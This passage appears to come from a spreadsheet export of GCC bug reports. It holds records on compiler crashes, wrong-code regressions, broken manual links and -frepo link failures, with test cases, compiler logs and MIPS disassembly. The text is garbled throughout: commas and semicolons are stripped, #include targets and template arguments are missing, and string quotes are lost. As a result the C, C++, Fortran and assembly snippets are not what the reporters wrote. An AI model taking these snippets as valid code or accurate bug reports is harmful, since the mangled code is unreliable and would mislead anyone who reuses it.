        movl    $.LC4 %edi
        call    sysv_abi_func
This apparently cannot work if sysv_abi_func clobbers %esi - and it is free to do so as it is a SYSV AMD64 ABI function.
Additional notes:
- this doesn't happen when the ms_abi_func is NOT declared as __attribute__((ms_abi))
- this doesn't happen when the sysv_abi_func IS declared as __attribute__((ms_abi))
- this doesn't happen when the global is not a global variable - i.e. it works when all of the calls are passed an address of the same local variable
- this doesn't happen when optimization is disabled (-O0)</t>
  </si>
  <si>
    <t>GCC-50100</t>
  </si>
  <si>
    <t>4.6.1 C++ Manuals Missing</t>
  </si>
  <si>
    <t>http://gcc.gnu.org/onlinedocs/ has the following lines:
# GCC 4.6.1 Standard C++ Library Manual (also in PDF or XML or an HTML tarball)
# GCC 4.6.1 Standard C++ Library Reference Manual (also in PDF or XML or an HTML tarball)
All links are broken.  
It may or may not be related but the contents of http://gcc.gnu.org/onlinedocs/libstdc++/ are dated 2009.  Doxygen output indicates it was generated in 2009.</t>
  </si>
  <si>
    <t>GCC-5434</t>
  </si>
  <si>
    <t>g++ ICEs on construction of variable sized object</t>
  </si>
  <si>
    <t>When building a class I was using a const unsigned instead of a #define so
g++ could do type checking. However I used an array with this constant as its
size. Therefor g++ considered it a variable size array. The program now refused
to call the constructor (both when declared with char * and string argument).
It complained about not finding an appropriate one and ICEd after that.
Release:
3.0.3 (Debian testing/unstable)
Environment:
System: Linux kvip24 2.4.17 #3 Thu Jan 10 18:34:23 CET 2002 i686 unknown
Architecture: i686
root library (root.cern.ch) version 3.02/07 18 januari 2002
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux
How-To-Repeat:
$ g++ -Wall -O `root-config --cflags` -v -save-temps -o prog.o -c prog.cc
Reading specs from /usr/lib/gcc-lib/i386-linux/2.95.4/specs
gcc version 2.95.4  (Debian prerelease)
 /usr/lib/gcc-lib/i386-linux/2.95.4/cpp0 -lang-c++ -v -I/usr/src/root/include -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -D__OPTIMIZE__ -Wall -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -D_REENTRANT prog.cc prog.ii
GNU CPP version 2.95.4  (Debian prerelease) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/src/root/include
 /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../include/g++-3
 /usr/local/include
 /usr/lib/gcc-lib/i386-linux/2.95.4/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../i386-linux/include
End of omitted list.
 /usr/lib/gcc-lib/i386-linux/2.95.4/cc1plus prog.ii -quiet -dumpbase prog.cc -O -Wall -version -o prog.s
GNU C++ version 2.95.4  (Debian prerelease) (i386-linux) compiled by GNU C version 2.95.4  (Debian prerelease).
prog.cc: In function `int main(int char **)':
prog.cc:25: variable-sized object `d' may not be initialized
prog.cc:25: no matching function for call to `data::data ()'
data.h:10: candidates are: data::data(char *)
data.h:18:                 data::data(const data &amp;)
prog.cc:32: Internal compiler error:
prog.cc:32: internal error--insn does not satisfy its constraints:
(insn 412 185 190 (set (reg:SI 0 %eax)
        (reg:SI 28)) 48 {movsi+2} (nil)
    (nil))
make: *** [prog.o] Error 1</t>
  </si>
  <si>
    <t>b.wijnen</t>
  </si>
  <si>
    <t>GCC-681</t>
  </si>
  <si>
    <t>n/a</t>
  </si>
  <si>
    <t>n/a
Release:
unknown
Environment:
rh7.0
How-To-Repeat:
n/a</t>
  </si>
  <si>
    <t>xpa</t>
  </si>
  <si>
    <t>GCC-16036</t>
  </si>
  <si>
    <t>[4.0 regression] Spurious may be used uninitialized in this function warning</t>
  </si>
  <si>
    <t>Current CVS mainline G++ (3.5.0 20040617) generate warning 
with command line: g++ -O -Wuninitialized -funit-at-a-time -o test.o -c test.cc
but not generate with: g++ -O -Wuninitialized -o test.o -c test.cc 
for code:
--8X-----------------------
#include
int main() {
  try{
    std::ofstream out(test.log)
    if(out.fail()) return 1
  }catch(...){
    return 1
  }
  return 0
}
---X8----------------------</t>
  </si>
  <si>
    <t>GCC-42485</t>
  </si>
  <si>
    <t>[4.4/4.5/4.6 Regression] -V switch broken</t>
  </si>
  <si>
    <t>Starting at GCC 4.4.0 the -V switch doesn't work:
$ gcc-4.1 -V4.3 -dumpversion
4.3.4
$ gcc-4.4 -V4.3 -dumpversion
$</t>
  </si>
  <si>
    <t>GCC-68339</t>
  </si>
  <si>
    <t>g++.dg/vect/simd-clone-2.cc ICEs with aggressive GC settings and OpenMP</t>
  </si>
  <si>
    <t>Compiling g++.dg/vect/simd-clone-2.cc with
  --param ggc-min-heapsize=0 --param ggc-min-expand=0 -fopenmp-simd
results in a memory corruption ICE.  This seems to be because expand_simd_clones calls simd_clone_mangle which generates an identifier and then calls simd_clone_create which eventually calls ggc_collect from execute_one_ipa_transform_pass.
Since nothing refers to the identifier yet it gets collected as garbage so when expand_simd_clones tries to use it the compiler blows up.</t>
  </si>
  <si>
    <t>GCC-49938</t>
  </si>
  <si>
    <t>[4.7 regression] ICE in interpret_loop_phi at tree-scalar-evolution.c:1645</t>
  </si>
  <si>
    <t>This ICE happened when building chromium. 
Testcase reduced with multidelta:
 % cat test.cpp
#include 
#include 
typedef unsigned short uint16
namespace base {
        class StringPiece
        {
                public:    typedef size_t size_type
                           size_type size() const { return length_ } size_type length_
        }
}
namespace net {
        class DNSSECKeySet
        {
                bool CheckSignature (const base::StringPiece&amp; name const
                                base::StringPiece&amp; zone const
                                base::StringPiece&amp; signature uint16 rrtype
                                const std::vector
        }
}
template  class scoped_array
        {
        public: typedef C element_type
        explicit scoped_array(C* p = __null):array_(p) {}
        private:   C* array_
        }
namespace net {
        bool DNSSECKeySet::CheckSignature (const base::StringPiece&amp; name
        const base::StringPiece&amp; zone const base::StringPiece&amp; signature
        uint16 rrtype const std::vector&amp; rrdatas)
        {
        unsigned signed_data_len = 0
        for (std::vector::const_iterator i = rrdatas.begin()
                        i != rrdatas.end() i++) {
                signed_data_len += 2
                signed_data_len += i-&gt;size()
        }
        scoped_array signed_data(new unsigned char[signed_data_len])
        }
}
% g++ -O test.cpp
test.cpp: In member function â€˜bool net::DNSSECKeySet::CheckSignature(const base::StringPiece&amp; const base::StringPiece&amp; const base::StringPiece&amp; uint16 const std::vector&amp;)â€™:
test.cpp:31:7: internal compiler error: in interpret_loop_phi at tree-scalar-evolution.c:1645
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-55882</t>
  </si>
  <si>
    <t>[4.7 Regression] unaligned load/store : incorrect struct offset</t>
  </si>
  <si>
    <t>void testfunction(somestruct * chip)
{
    unsigned i
    for (i = 0 i &lt; 4 i++)
    {
       {
tUint64 mask = ((((((((((chip-&gt;pp_mask) 
    chip-&gt;config-&gt;smth[i].xyz = chip-&gt;config-&gt;smth[i].xyz 
}
    }
The structure 'somestruct' is hard to reduce and for various reasons I can not disclose it. 
GCC 4.6 :
=========
00000000 :
   0:   27bdffe8    addiu   spsp-24
   4:   afbe0014    sw  s820(sp)
   8:   03a0f02d    move    s8sp
   c:   afc40018    sw  a024(s8)
  10:   afc00000    sw  zero0(s8)
  14:   08000059    j   164 
  18:   00000000    nop
  1c:   8fc20018    lw  v024(s8)
  20:   8c431ab8    lw  v16840(v0)
  24:   3c020020    lui v00x20
  28:   00621024    and v0v1v0
  2c:   14400006    bnez    v048 
  30:   00000000    nop
  34:   8fc20018    lw  v024(s8)
  38:   8c421ab8    lw  v06840(v0)
  3c:   30420200    andi    v0v00x200
  40:   10400018    beqz    v0a4 
  44:   00000000    nop
  48:   8fc20018    lw  v024(s8)
  4c:   8c431ab8    lw  v16840(v0)
  50:   3c020020    lui v00x20
  54:   00621024    and v0v1v0
  58:   1440000e    bnez    v094 
  5c:   00000000    nop
  60:   8fc20018    lw  v024(s8)
  64:   8c421ab8    lw  v06840(v0)
  68:   30420200    andi    v0v00x200
  6c:   10400005    beqz    v084 
  70:   00000000    nop
  74:   24030fff    li  v14095
  78:   0000102d    move    v0zero
  7c:   08000023    j   8c 
  80:   00000000    nop
  84:   2403ffff    li  v1-1
  88:   2402ffff    li  v0-1
  8c:   08000027    j   9c 
  90:   00000000    nop
  94:   240300ff    li  v1255
  98:   0000102d    move    v0zero
  9c:   0800002c    j   b0 
  a0:   00000000    nop
  a4:   2403ffff    li  v1-1
  a8:   3c027fff    lui v00x7fff
  ac:   3442ffff    ori v0v00xffff
  b0:   afc3000c    sw  v112(s8)
  b4:   afc20008    sw  v08(s8)
  b8:   8fc20018    lw  v024(s8)
  bc:   8c461ac0    lw  a26848(v0)
  c0:   8fc20018    lw  v024(s8)
  c4:   8c451ac0    lw  a16848(v0)
  c8:   8fc40000    lw  a00(s8)
  cc:   0080182d    move    v1a0
  d0:   00031080    sll v0v10x2
  d4:   0040182d    move    v1v0
  d8:   00031080    sll v0v10x2
  dc:   00431023    subu    v0v0v1
  e0:   00441023    subu    v0v0a0
  e4:   000211c0    sll v0v00x7
  e8:   00a21021    addu    v0a1v0
  ec:   8c4212d0    lw  v04816(v0)
  f0:   00021502    srl v0v00x14
  f4:   3042ffff    andi    v0v00xffff
  f8:   0040182d    move    v1v0
  fc:   97c2000e    lhu v014(s8)
 100:   00021027    nor v0zerov0
 104:   3042ffff    andi    v0v00xffff
 108:   00621024    and v0v1v0
 10c:   3042ffff    andi    v0v00xffff
 110:   30420fff    andi    v0v00xfff
 114:   3045ffff    andi    a1v00xffff
 118:   8fc40000    lw  a00(s8)
 11c:   0080182d    move    v1a0
 120:   00031080    sll v0v10x2
 124:   0040182d    move    v1v0
 128:   00031080    sll v0v10x2
 12c:   00431023    subu    v0v0v1
 130:   00441023    subu    v0v0a0
 134:   000211c0    sll v0v00x7
 138:   00c21021    addu    v0a2v0
 13c:   00051d00    sll v1a10x14
 140:   8c4512d0    lw  a14816(v0)                 &lt;&lt;&lt;&lt;&lt; !
 144:   3c04000f    lui a00xf
 148:   3484ffff    ori a0a00xffff
 14c:   00a42024    and a0a1a0
 150:   00831825    or  v1a0v1
 154:   ac4312d0    sw  v14816(v0)                 &lt;&lt;&lt;&lt;&lt; !
 158:   8fc20000    lw  v00(s8)
 15c:   24420001    addiu   v0v01
 160:   afc20000    sw  v00(s8)
 164:   8fc20000    lw  v00(s8)
 168:   2c420004    sltiu   v0v04
 16c:   1440ffab    bnez    v01c 
 170:   00000000    nop
 174:   03c0e82d    move    sps8
 178:   8fbe0014    lw  s820(sp)
 17c:   27bd0018    addiu   spsp24
 180:   03e00008    jr  ra
 184:   00000000    nop
GCC 4.8
=======
00000000 :
   0:   27bdffe8    addiu   spsp-24
   4:   afbe0014    sw  s820(sp)
   8:   03a0f02d    move    s8sp
   c:   afc40018    sw  a024(s8)
  10:   afc00000    sw  zero0(s8)
  14:   0800005a    j   168 
  18:   00000000    nop
  1c:   8fc20018    lw  v024(s8)
  20:   8c431ab8    lw  v16840(v0)
  24:   3c020020    lui v00x20
  28:   00621024    and v0v1v0
  2c:   14400006    bnez    v048 
  30:   00000000    nop
  34:   8fc20018    lw  v024(s8)
  38:   8c421ab8    lw  v06840(v0)
  3c:   30420200    andi    v0v00x200
  40:   10400018    beqz    v0a4 
  44:   00000000    nop
  48:   8fc20018    lw  v024(s8)
  4c:   8c431ab8    lw  v16840(v0)
  50:   3c020020    lui v00x20
  54:   00621024    and v0v1v0
  58:   1440000e    bnez    v094 
  5c:   00000000    nop
  60:   8fc20018    lw  v024(s8)
  64:   8c421ab8    lw  v06840(v0)
  68:   30420200    andi    v0v00x200
  6c:   10400005    beqz    v084 
  70:   00000000    nop
  74:   24030fff    li  v14095
  78:   0000102d    move    v0zero
  7c:   08000027    j   9c 
  80:   00000000    nop
  84:   2403ffff    li  v1-1
  88:   2402ffff    li  v0-1
  8c:   0800002c    j   b0 
  90:   00000000    nop
  94:   240300ff    li  v1255
  98:   0000102d    move    v0zero
  9c:   0800002c    j   b0 
  a0:   00000000    nop
  a4:   2403ffff    li  v1-1
  a8:   3c027fff    lui v00x7fff
  ac:   3442ffff    ori v0v00xffff
  b0:   afc3000c    sw  v112(s8)
  b4:   afc20008    sw  v08(s8)
  b8:   8fc20018    lw  v024(s8)
  bc:   8c461ac0    lw  a26848(v0)
  c0:   8fc20018    lw  v024(s8)
  c4:   8c451ac0    lw  a16848(v0)
  c8:   8fc40000    lw  a00(s8)
  cc:   0080182d    move    v1a0
  d0:   00031080    sll v0v10x2
  d4:   0040182d    move    v1v0
  d8:   00031080    sll v0v10x2
 dc:   00431023    subu    v0v0v1
  e0:   00441023    subu    v0v0a0
  e4:   000211c0    sll v0v00x7
  e8:   00a21021    addu    v0a1v0
  ec:   8c4212d0    lw  v04816(v0)
  f0:   00021502    srl v0v00x14
  f4:   3042ffff    andi    v0v00xffff
  f8:   0040182d    move    v1v0
  fc:   97c2000e    lhu v014(s8)
 100:   00021027    nor v0zerov0
 104:   3042ffff    andi    v0v00xffff
 108:   00621024    and v0v1v0
 10c:   3042ffff    andi    v0v00xffff
 110:   30420fff    andi    v0v00xfff
 114:   3045ffff    andi    a1v00xffff
 118:   8fc40000    lw  a00(s8)
 11c:   0080182d    move    v1a0
 120:   00031080    sll v0v10x2
 124:   0040182d    move    v1v0
 128:   00031080    sll v0v10x2
 12c:   00431023    subu    v0v0v1
 130:   00441023    subu    v0v0a0
 134:   000211c0    sll v0v00x7
 138:   00c21021    addu    v0a2v0
 13c:   30a30fff    andi    v1a10xfff
 140:   00031900    sll v1v10x4
 144:   8c4512ce    lw  a14814(v0)              &lt;&lt;&lt;&lt;&lt; ! 
 148:   3c04ffff    lui a00xffff
 14c:   3484000f    ori a0a00xf
 150:   00a42024    and a0a1a0
 154:   00831825    or  v1a0v1
 158:   ac4312ce    sw  v14814(v0)              &lt;&lt;&lt;&lt;&lt; !
 15c:   8fc20000    lw  v00(s8)
 160:   24420001    addiu   v0v01
 164:   afc20000    sw  v00(s8)
 168:   8fc20000    lw  v00(s8)
 16c:   2c420004    sltiu   v0v04
 170:   1440ffaa    bnez    v01c 
 174:   00000000    nop
 178:   03c0e82d    move    sps8
 17c:   8fbe0014    lw  s820(sp)
 180:   27bd0018    addiu   spsp24
 184:   03e00008    jr  ra
 188:   00000000    nop
$ diff --side-by-side --suppress-common /tmp/46 /tmp/48 -W120 |less
  14:   08000059        j       164    |      14:   0800005a        j       168 
  7c:   08000023        j       8c      |      7c:   08000027        j       9c 
  8c:   08000027        j       9c      |      8c:   0800002c        j       b0 
 13c:   00051d00        sll     v1a10x14                 |     13c:   30a30fff        andi    v1a10xfff
 140:   8c4512d0        lw      a14816(v0)                |     140:   00031900        sll     v1v10x4
 144:   3c04000f        lui     a00xf                     |     144:   8c4512ce        lw      a14814(v0)
 148:   3484ffff        ori     a0a00xffff               |     148:   3c04ffff        lui     a00xffff
 14c:   00a42024        and     a0a1a0                   |     14c:   3484000f        ori     a0a00xf
 150:   00831825        or      v1a0v1                   |     150:   00a42024        and     a0a1a0
 154:   ac4312d0        sw      v14816(v0)                |     154:   00831825        or      v1a0v1
 158:   8fc20000        lw      v00(s8)                   |     158:   ac4312ce        sw      v14814(v0)
 15c:   24420001        addiu   v0v01                    |     15c:   8fc20000        lw      v00(s8)
 160:   afc20000        sw      v00(s8)                   |     160:   24420001        addiu   v0v01
 164:   8fc20000        lw      v00(s8)                   |     164:   afc20000        sw      v00(s8)
 168:   2c420004        sltiu   v0v04                    |     168:   8fc20000        lw      v00(s8)
 16c:   1440ffab        bnez    v01c &lt;testfunction+0x1c   |     16c:   2c420004        sltiu   v0v04
 170:   00000000        nop                                |     170:   1440ffaa        bnez    v01c &lt;testfunction+0x1c
 174:   03c0e82d        move    sps8                      |     174:   00000000        nop
 178:   8fbe0014        lw      s820(sp)                  |     178:   03c0e82d        move    sps8
 17c:   27bd0018        addiu   spsp24                   |     17c:   8fbe0014        lw      s820(sp)
 180:   03e00008        jr      ra                         |     180:   27bd0018        addiu   spsp24
 184:   00000000        nop                                |     184:   03e00008        jr      ra
                                                           &gt;     188:   00000000        nop</t>
  </si>
  <si>
    <t>GCC-70960</t>
  </si>
  <si>
    <t>[7 Regression] ICE: tree check: expected ssa_name have integer_cst in ifcvt_walk_pattern_tree at tree-if-conv.c:2465</t>
  </si>
  <si>
    <t>recent trunk regression:
&gt; cat bug.f90 
  SUBROUTINE calbrec(aaierror)
    REAL(KIND=8)                            :: a(33) ai(33)
    DO i = 1 3
       il = 1
       IF (i==1) il = 2
       DO j = 1 3
          ai(ji) = (-1.0_8)**(i+j)*det*(a(iljl)*a(iuju)-a(ilju)*a(iujl))
       END DO
    END DO
  END SUBROUTINE calbrec
&gt; gfortran -c -fprofile-generate -O3 bug.f90 
bug.f90:1:0:
   SUBROUTINE calbrec(aaierror)
internal compiler error: tree check: expected ssa_name have integer_cst in ifcvt_walk_pattern_tree at tree-if-conv.c:2465
0xe42ad4 tree_check_failed(tree_node const* char const* int char const* ...)
	../../gcc/gcc/tree.c:9753
0xc095d6 tree_check
	../../gcc/gcc/tree.h:3025
0xc095d6 ifcvt_walk_pattern_tree
	../../gcc/gcc/tree-if-conv.c:2465
0xc094e0 ifcvt_walk_pattern_tree
	../../gcc/gcc/tree-if-conv.c:2491
0xc0edbe ifcvt_repair_bool_pattern
	../../gcc/gcc/tree-if-conv.c:2580
0xc0edbe tree_if_conversion
	../../gcc/gcc/tree-if-conv.c:2746
0xc0edbe execute
	../../gcc/gcc/tree-if-conv.c:2829
0xc0edbe execute
	../../gcc/gcc/tree-if-conv.c:2808
Please submit a full bug report
&gt; gfortran -v
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/data/vjoost/gnu/gcc_trunk/install/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc/configure --prefix=/data/vjoost/gnu/gcc_trunk/install --enable-languages=cc++fortran --disable-multilib --enable-plugins --enable-lto --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160505 (experimental) [trunk revision 235918] (GCC)</t>
  </si>
  <si>
    <t>GCC-32032</t>
  </si>
  <si>
    <t>[4.3 Regression] Inliner not setting has_volatile_ops</t>
  </si>
  <si>
    <t>I'm getting the following ICE at -O3 with 4.3.  This was introduced between
0070422 and 20070515.
(sid)24741:tbm@em64t: ~] /usr/lib/gcc-snapshot/bin/gcc -c -O3 dash-options.i
/home/tbm/src/b/dash-0.5.3/build-tmp/../src/options.c: In function 'setparam':
/home/tbm/src/b/dash-0.5.3/build-tmp/../src/options.c:287: internal compiler error: in compute_antic at tree-ssa-pre.c:1968
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-81633</t>
  </si>
  <si>
    <t>[7/8 Regression] Incorrect floating point result with tree vectoriser</t>
  </si>
  <si>
    <t>Created attachment 41873
Preprocessed source.
The attached source (reduced from a real kernel) multiplies a 4x4 identity matrix by its first column  It should produce the output:
1 0 0 0
0 0 0 0
0 0 0 0
0 0 0 0
With GCC 7.1.0 (and a recent 8.0.0 snapshot) it produces instead:
1 1 1 1
0 0 0 0
0 0 0 0
0 0 0 0
The bug disappears if I say either -fno-tree-vectorize or -fno-tree-loop-vectorize
$ gcc -o prog.exe -Wall -Wextra -std=c99 -pedantic -O3 -v prog.c
Using built-in specs.
COLLECT_GCC=/opt/wandbox/gcc-7.1.0/bin/gcc
COLLECT_LTO_WRAPPER=/opt/wandbox/gcc-7.1.0/libexec/gcc/x86_64-pc-linux-gnu/7.1.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-7.1.0/configure --prefix=/opt/wandbox/gcc-7.1.0 --enable-languages=cc++ --disable-multilib --without-ppl --without-cloog-ppl --enable-checking=release --disable-nls LDFLAGS=-Wl-rpath/opt/wandbox/gcc-7.1.0/lib-rpath/opt/wandbox/gcc-7.1.0/lib64-rpath/opt/wandbox/gcc-7.1.0/lib32 --enable-lto
Thread model: posix
gcc version 7.1.0 (GCC) 
COLLECT_GCC_OPTIONS='-o' 'prog.exe' '-Wpedantic' '-std=c99' '-Wall' '-Wextra' '-O3' '-v' '-mtune=generic' '-march=x86-64'
 /opt/wandbox/gcc-7.1.0/libexec/gcc/x86_64-pc-linux-gnu/7.1.0/cc1 -quiet -v -imultiarch x86_64-linux-gnu prog.c -quiet -dumpbase prog.c -mtune=generic -march=x86-64 -auxbase prog -O3 -Wpedantic -Wall -Wextra -std=c99 -version -o /tmp/ccorXUPc.s
GNU C99 (GCC) version 7.1.0 (x86_64-pc-linux-gnu)
	compiled by GNU C version 7.1.0 GMP version 6.1.0 MPFR version 3.1.4 MPC version 1.0.3 isl version none
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
ignoring nonexistent directory /usr/local/include/x86_64-linux-gnu
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /opt/wandbox/gcc-7.1.0/lib/gcc/x86_64-pc-linux-gnu/7.1.0/../../../../x86_64-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /opt/wandbox/gcc-7.1.0/lib/gcc/x86_64-pc-linux-gnu/7.1.0/include
 /opt/wandbox/gcc-7.1.0/include
 /opt/wandbox/gcc-7.1.0/lib/gcc/x86_64-pc-linux-gnu/7.1.0/include-fixed
 /usr/include/x86_64-linux-gnu
 /usr/include
End of search list.
GNU C99 (GCC) version 7.1.0 (x86_64-pc-linux-gnu)
	compiled by GNU C version 7.1.0 GMP version 6.1.0 MPFR version 3.1.4 MPC version 1.0.3 isl version none
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 5122689c716743eb07fee255d0dfe7c4
COLLECT_GCC_OPTIONS='-o' 'prog.exe' '-Wpedantic' '-std=c99' '-Wall' '-Wextra' '-O3' '-v' '-mtune=generic' '-march=x86-64'
 as -v --64 -o /tmp/cc0c1aeA.o /tmp/ccorXUPc.s
GNU assembler version 2.26.1 (x86_64-linux-gnu) using BFD version (GNU Binutils for Ubuntu) 2.26.1
COMPILER_PATH=/opt/wandbox/gcc-7.1.0/libexec/gcc/x86_64-pc-linux-gnu/7.1.0/:/opt/wandbox/gcc-7.1.0/libexec/gcc/x86_64-pc-linux-gnu/7.1.0/:/opt/wandbox/gcc-7.1.0/libexec/gcc/x86_64-pc-linux-gnu/:/opt/wandbox/gcc-7.1.0/lib/gcc/x86_64-pc-linux-gnu/7.1.0/:/opt/wandbox/gcc-7.1.0/lib/gcc/x86_64-pc-linux-gnu/
LIBRARY_PATH=/opt/wandbox/gcc-7.1.0/lib/gcc/x86_64-pc-linux-gnu/7.1.0/:/opt/wandbox/gcc-7.1.0/lib/gcc/x86_64-pc-linux-gnu/7.1.0/../../../../lib64/:/lib/x86_64-linux-gnu/:/lib/../lib64/:/usr/lib/x86_64-linux-gnu/:/opt/wandbox/gcc-7.1.0/lib/gcc/x86_64-pc-linux-gnu/7.1.0/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-o' 'prog.exe' '-Wpedantic' '-std=c99' '-Wall' '-Wextra' '-O3' '-v' '-mtune=generic' '-march=x86-64'
 /opt/wandbox/gcc-7.1.0/libexec/gcc/x86_64-pc-linux-gnu/7.1.0/collect2 -plugin /opt/wandbox/gcc-7.1.0/libexec/gcc/x86_64-pc-linux-gnu/7.1.0/liblto_plugin.so -plugin-opt=/opt/wandbox/gcc-7.1.0/libexec/gcc/x86_64-pc-linux-gnu/7.1.0/lto-wrapper -plugin-opt=-fresolution=/tmp/ccfS7LEX.res -plugin-opt=-pass-through=-lgcc -plugin-opt=-pass-through=-lgcc_s -plugin-opt=-pass-through=-lc -plugin-opt=-pass-through=-lgcc -plugin-opt=-pass-through=-lgcc_s --eh-frame-hdr -m elf_x86_64 -dynamic-linker /lib64/ld-linux-x86-64.so.2 -o prog.exe /usr/lib/x86_64-linux-gnu/crt1.o /usr/lib/x86_64-linux-gnu/crti.o /opt/wandbox/gcc-7.1.0/lib/gcc/x86_64-pc-linux-gnu/7.1.0/crtbegin.o -L/opt/wandbox/gcc-7.1.0/lib/gcc/x86_64-pc-linux-gnu/7.1.0 -L/opt/wandbox/gcc-7.1.0/lib/gcc/x86_64-pc-linux-gnu/7.1.0/../../../../lib64 -L/lib/x86_64-linux-gnu -L/lib/../lib64 -L/usr/lib/x86_64-linux-gnu -L/opt/wandbox/gcc-7.1.0/lib/gcc/x86_64-pc-linux-gnu/7.1.0/../../.. -rpath /opt/wandbox/gcc-7.1.0/lib64 /tmp/cc0c1aeA.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /opt/wandbox/gcc-7.1.0/lib/gcc/x86_64-pc-linux-gnu/7.1.0/crtend.o /usr/lib/x86_64-linux-gnu/crtn.o
COLLECT_GCC_OPTIONS='-o' 'prog.exe' '-Wpedantic' '-std=c99' '-Wall' '-Wextra' '-O3' '-v' '-mtune=generic' '-march=x86-64'
$ ./prog.exe
1 1 1 1 
0 0 0 0 
0 0 0 0 
0 0 0 0</t>
  </si>
  <si>
    <t>wence</t>
  </si>
  <si>
    <t>GCC-34178</t>
  </si>
  <si>
    <t>[4.1/4.2/4.3 Regression] Compilation using -frepo fails</t>
  </si>
  <si>
    <t>When compiling the following piece of code with -frepo linking fails
template
class A
{
	private:
		static int x
	public:
		int getX() { return x }
}
template int A::x=0
int main()
{
	A a
	a.getX()
}
g++  -frepo  -c -o test.o test.cpp
g++ -o test test.o
collect: recompiling test.cpp
collect: relinking
test.o: In function `A::getX()':
test.cpp:(.text+0x4): undefined reference to `A::x'
collect2: ld returned 1 exit status
I tested this with an unpatched gcc 4.3.0 20071012 and 4.1.2 with on Gentoo Linux. 
gcc 3.4.6 compiles correctly. 
Probably the output of the .rpo-files is interesting:
gcc-3: 
M test.cpp
D /home/rbuergel/frepo-test
A '-frepo' '-c' '-o' 'test.o' '-march=i686'
C _ZN1AIiE1xE
O _ZN1AIiE4getXEv
gcc-4:
M test.cpp
D /home/rbuergel/frepo-test
A '-frepo' '-c' '-o' 'test.o' '-shared-libgcc' '-mtune=generic' '-march=i686' '-frandom-seed=0x63d4762b' '-shared-libgcc'
C _ZN1AIiE4getXEv
gcc-4 gets it right if x is just declared and defined but not initialized.</t>
  </si>
  <si>
    <t>GCC-53315</t>
  </si>
  <si>
    <t>simple xtest program generates ICE</t>
  </si>
  <si>
    <t>gcc version 4.8.0 20120510 (experimental) (GCC) 
#include 
main()
{
        int flag = -1
        unsigned status
        if ((status = _xbegin()) == _XBEGIN_STARTED) {
                flag = _xtest()
                _xend()
        } else
                printf(abort %x\n status)
        printf(%d\n  flag)
        printf(%d\n _xtest())
}
gives
xtest.c: In function 'main':
xtest.c:12:3: warning: incompatible implicit declaration of built-in function 'printf' [enabled by default]
   printf(abort %x\n status)
   ^
xtest.c:15:1: error: unable to generate reloads for:
 }
 ^
(jump_insn 7 6 8 2 (parallel [
            (set (pc)
                (if_then_else (ne (unspec [
                                (const_int 0 [0])
                            ] UNSPEC_XBEGIN_ABORT)
                        (const_int 0 [0]))
                    (label_ref 8)
                    (pc)))
            (set (reg:SI 4 si [63])
                (unspec_volatile:SI [
                        (reg:SI 3 bx [64])
                    ] UNSPECV_XBEGIN))
        ]) /pkg/gcc-4.8-120510/lib64/gcc/x86_64-unknown-linux-gnu/4.8.0/include/rtmintrin.h:50 978 {xbegin_1}
     (nil)
 -&gt; 8)
xtest.c:15:1: internal compiler error: in find_reloads at reload.c:3825</t>
  </si>
  <si>
    <t>GCC-10024</t>
  </si>
  <si>
    <t>[3.4 regression] [HP-PA] inline optimization ICE</t>
  </si>
  <si>
    <t>see below code works with gcc-3.2.3	 
This is extracted from allegro. It is similar but not the same as 
optimization/9768
The error also affects hpux.
Running under gdb I see:
Program received signal SIGSEGV Segmentation fault.
fixup_reorder_chain () at ../../gcc/gcc/cfglayout.c:467
467                   if (RBI (bb)-&gt;next != e_taken-&gt;dest)
(gdb) p e_taken
$1 = 0x0
Release:
3.3 20030309 (Debian prerelease) (Debian testing/unstable)
Environment:
System: Linux gsyprf11.external.hp.com 2.4.20-pa18-UP #1 Sat Jan 4 22:06:52 PST 2003 parisc64 unknown unknown GNU/Linux
Architecture: parisc64
hppa2.0w-hp-hpux11
host: hppa-unknown-linux-gnu
build: hppa-unknown-linux-gnu
target: hppa-unknown-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++f77objcadatreelang --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-sjlj-exceptions --enable-clocale=gnu --enable-debug --enable-objc-gc hppa-linux
How-To-Repeat:
gcc-3.3 -O2 -c bug.c
--------------------8&lt; bug.c 8&lt;-------------------
extern int * allegro_errno
typedef long fixed
extern inline int fixfloor (fixed x) { if (x &gt;= 0) return (x &gt;&gt; 16) else return ~((~x) &gt;&gt; 16) }
extern inline int fixtoi (fixed x) { return fixfloor(x) + ((x  }
